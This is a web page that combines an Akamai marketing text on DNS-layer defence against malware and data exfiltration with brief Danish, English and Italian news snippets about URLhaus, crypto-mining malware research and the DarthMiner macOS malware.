We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.

malware.png

These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

I marts 2018 blev projektet URLhaus lanceret af abuse.ch, der er en non-profit cyber-sikkerhedsorganisation, baseret i Schweiz.

Formålet med URLhaus er at indsamle URL’er fra sider, der distribuerer malware, hvilket efter ti måneders arbejde har resulteret i, at samarbejdet nu har lukket ikke mindre end 100.000 sider.

256 sikkerhedsforskere, der er spredt over hele verden, rapporterer hver dag til URLhaus om malware-sider, og de hjælper på den måde internetbrugerne mod malware-kampagner.

Sprog
Dansk

Keywords: malwarenon-profitLæs mere om Non-profit samarbejde har nu lukket 100.000 malware-sider

“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware

I ricercatori di sicurezza di Malwarebytes hanno individuato un nuovo malware per macOS, battezzato DarthMiner, che combina le funzionalità della backdoor EmPyre e del cryptominer XMRig.